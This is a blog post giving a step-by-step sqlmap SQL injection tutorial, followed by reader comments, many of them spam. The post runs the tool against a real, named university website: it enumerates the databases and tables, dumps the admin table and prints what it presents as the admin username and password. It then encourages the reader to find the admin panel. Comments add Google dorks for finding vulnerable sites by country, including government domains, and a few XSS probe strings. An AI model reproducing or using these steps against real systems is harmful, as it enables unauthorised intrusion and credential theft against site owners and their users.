Pages

Tuesday, January 17

SQLmap Step By Step Tutorial

Today we will see the step-by-step tutorial of Sqlmap.
Sqlmap is developed in Python and it is available with Backtrack 5 and Backtrack 5 R1 and all versions of Backtrak, Otherwise you can download seperately also from

$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

Sqlmap is is best sql injection tool.

With sqlmap we can know the database name and type of database i.e,Mysql or SqlServer or ........ and we can find the database name and tables related to that database and we can dump the data from the database.
It is totally a database takeover tool

Steps:

1.First we require the vulnerable target and here it is

http://www.hu.edu.pk/viewfaculty.php?id=12

2.Go to Backtrack and type cd /pentest/database/sqlmap




3.Run the sqlmap

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12

-u is the vulnerable url



./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs

or

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db



if you write as --dbs then it will fetch all the databases in the server

and if you write --current-db then it will fetch only the database related to the current website

we will get the database name

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables



Here after -D we have to give the database name

--tables means we are trying to fetch the tables in the current database

and we will get the table names



after that we have to fetch only the table information which we required

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns

we will get the names of columns in that table with datatype

 




./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name --dump



now we will get the total information in the table "admin"






After finishing all the process you r having




Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123


Now you are having admin username and admin password , find the Admin Panel and  :)
at

23 comments:

  1. devender mahtoJune 11, 2012 at 8:51 PM

    how to find the admin panel is there is any tool or website to find the admin panel...

    ReplyDelete
  2. IcebergDelphiSeptember 15, 2012 at 3:44 PM

    Thanks for this tuto, but How do ya know about the website, i mean, how did ya know that the website is vulnerable? did you scan it with some tool before the attack? Thanks .

    ReplyDelete
  3. Day MilovichJuly 11, 2013 at 11:32 AM

    @devender : you can use "admin finder" with online service. there are many.
    @iceberg : try to give error input to get error message.

    ReplyDelete
  4. AnonymousOctober 9, 2013 at 7:33 AM

    you can find the admin control panel in havij that's no a problem

    ReplyDelete
  5. UnknownFebruary 1, 2014 at 12:23 PM

    @Iceberg: Use Google Dorks To Find The Vulnerable Website... Ex
    inurl:index.php?id=
    inurl:gallery.php?id=
    inurl:post.php?id=
    inurl:article?id=
    inurl:php?id=

    If you want the website from a specific country then type the country domain...
    inurl:php?id= site:pk
    inurl:php?id= site:in
    inurl:php?id= site:co.in
    inurl:php?id= site:gov.in

    I suggest you to google it for more information....

    ReplyDelete
  6. triatmaMarch 27, 2014 at 12:49 PM

    Thanks for your tutorial sir, its very easy.

    ReplyDelete
  7. UnknownMarch 28, 2014 at 11:14 AM

    if you cant understand then follow this tutorial
    Web Hacking: SQLMAP tutorial

    ReplyDelete
  8. Ahmad TauhidJune 3, 2014 at 11:43 PM

    nice tutorial. thanks

    ReplyDelete
  9. AnonymousSeptember 5, 2014 at 6:41 AM

    \";alert('XSS');//

    ReplyDelete
  10. AnonymousSeptember 5, 2014 at 6:43 AM


    ReplyDelete
  11. AnonymousSeptember 5, 2014 at 6:46 AM

    ¼script¾alert(¢XSS¢)¼/script¾

    ReplyDelete
  12. AnonymousMay 20, 2015 at 11:18 AM

    nice bozz

    ReplyDelete
  13. AnonymousJune 12, 2015 at 9:36 AM

    HYDERABAD............*-*

    ReplyDelete
  14. AnonymousSeptember 21, 2015 at 6:02 PM

    shamsher khan "future needs" :D wtf :D google it :D bookmaker :D

    ReplyDelete
  15. AshwinkOctober 12, 2015 at 2:44 AM

    Thanks for sharing this post.Very Informative

    ReplyDelete
  16. UnknownDecember 23, 2015 at 2:46 AM

    its nice sharing...!!!!
    download microsoft office 2007

    ReplyDelete
  17. UnknownAugust 29, 2016 at 12:38 AM


    awesome blog. i like this post and its very helpful to us. Thankyou For shearing This Information With Us.yatiken IT consultant

    ReplyDelete
  18. UnknownDecember 26, 2016 at 8:30 PM

    I want to know how use wireless chipset driver in backtrack...
    My WhatsApp +919608619653

    ReplyDelete
  19. Raj KumarOctober 20, 2017 at 10:41 PM

    One of India's fastest growing online bus ticket booking websites, Abhibus.com has partnered with ICICI Lombard General Insurance Company Ltd. To ...




    new website

    ReplyDelete
  20. UnknownOctober 22, 2017 at 11:23 PM

    website
    Thanks for sharing nice information with us

    ReplyDelete
  21. Shamshun ODMSOctober 23, 2017 at 11:54 PM

    Nice post
    Thanks for sharing this helpful article ,.
    best webdesign and development in hyderabad

    ReplyDelete
  22. UnknownOctober 25, 2017 at 12:02 AM

    After study a few of the websites on your own site now, i really such as your method of blogging. I bookmarked it to my bookmark website list and will be checking back soon. Pls have a look at my web site as well and figure out what you consider. more info here

    ReplyDelete
  23. UnknownDecember 11, 2017 at 11:28 PM

    Hmm i think this is nice post. I hope this is just begin of your writing. If you want you can check my blog as well. Of course if you want. Go Here

    ReplyDelete